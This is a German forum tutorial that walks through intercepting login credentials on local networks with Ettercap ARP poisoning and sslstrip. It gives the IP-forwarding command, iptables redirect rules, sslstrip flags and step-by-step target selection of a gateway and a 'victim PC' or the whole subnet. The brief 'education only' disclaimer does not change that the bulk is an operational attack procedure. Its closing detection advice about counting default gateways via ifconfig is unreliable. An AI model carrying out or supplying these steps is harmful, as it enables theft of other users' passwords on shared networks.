Hier mal ein Tutorial wie man im lokalen Netzwerk Passwörter mit "Ettercap" auslesen kann.
Man kann unverschlüsselte (http) als auch verschlüsselte Passwörter (https) auslesen.
Für die verschlüsselte Verbindungen braucht man noch das Tool "sslstrip".
Die Tools kann man aber auf jeder Linux Distribution installieren und benutzen. Ich empfehle jedoch Kali Linux oder Backtrack, da die nötigen Tools wie Ettercap und sslstrip bereits installiert sind.
Da Ettercap ein sehr mächtiges Tool ist, gibt es verschiedene Angriffsszenarien. Ich werde euch heute "Arp-Poisoning" zeigen.
WARNUNG: Dieses Tutorial soll nur zur Aufklärung dienen... Ich will im Grunde nur zeigen wie einfach es für einen Angreiffer ist, Passwörter in öffentlichen Netzwerken (Arbeit, Schulen, Internetcaf?©s etc.) zu sniffen. So werde ich die Konfiguration von Ettercap nicht* weiter erklären, um Script-Kiddies das Leben etwas zu erschweren. Man kann die Konfiguration von Ettercap eh überall im Netz finden...
Tool Beschreibung |
1. Interface checken und den Standart-Gateway notieren (192.168.x.x) Im Terminal -> "ifconfig" eingeben 2. Backtrack Host in IP-Forwarding Modus setzen -> "echo 1 > /proc/sys/net/ipv4/ip_forward" 3. etter.conf Datei konfigurieren (UID & Iptables) -> Die Datei "etter.conf" konfigurieren* 5. Iptables konfigurieren um die HTTP Datenströme zum sslstrip umzuleiten - Ethernet -> iptables -t nat -A PREROUTING -i eth0 -p tcp --destination-port 80 -j REDIRECT --to-port 10000 - oder Wlan -> iptables -t nat -A PREROUTING -i wlan0 -p tcp --destination-port 80 -j REDIRECT --to-port 10000 6. sslstrip starten -> sslstrip -a -k -f -l 10000 7. Ettercap-GTK starten (Neues Terminal öffnen) -> ettercap -G 8. Sniffing im Subnetz starten Sniff -> Unified sniffing 9. Interface auswählen - eth0 - wlan0 - ... 10. Hosts scannen Hosts -> Scan for hosts 11. gefundene Hosts x hosts added to the hosts list 12. gefundene Hosts auflisten x Hosts -> Hosts list 13. Target auswählen => Methode A (Gateway + bestimmter Rechner) - Target 1 auswählen (Gateway) Host 1/AP IP-192.168.x.x auswählen & Add to Target 1 drücken - Target 2 auswählen (Opfer-PC)** Host 2/Opfer-PC IP-192.168.x.y auswählen & Add to Target 2 drücken => Methode B (Gesamtes Netzwerk belauschen) - Kein Target auswählen und mit Punkt 14 weiterfahren 14. Man-in-the-Middle Attacke & ARP-Poisoning starten Mitm -> Arp poisoning 15. Parameter auswählen Sniff remote connections auswählen & OK drücken *Man kann die Konfiguration von Ettercap eh überall im Netz finden... **(Opfer-PC) Die Adresse des Rechners müsst ihr natürlich kennen ![]() |
Sobald jemand sich irgendwo über ein Login-Script einloggt, bekommt man das in Ettercap mit. Username und Passwort werden als Text ausgegen.
Bei HTTPS-Verbindungen, werden diese dank "sslstrip" in HTTP umgewandelt und man bekommt das Passwort trotzdem...
Wenn man Details über eine bestimmte Verbindungen möchte, kann er dies über "View/Connections" tun.
Wie bemerke ich dass jemand snifft?
Wenn man in der Konsole "ifconfig" eingibt, bekommt man den Standartgateway angewiesen.
Normal sollte es nur ein Standartgateway geben. Sollte es mehrere sein, sollte man das Netzwerk vermeiden bzw. über ein VPN-Tunnel sollte man der Attacke entgehen können.
Fazit/Empfehlung:
Wenn ihr öffentliche Netzwerke nutzt, loggt euch nicht in Accounts ein, die extrem sensible Daten und Informationen beinhalten. Logisch

MfG Xenio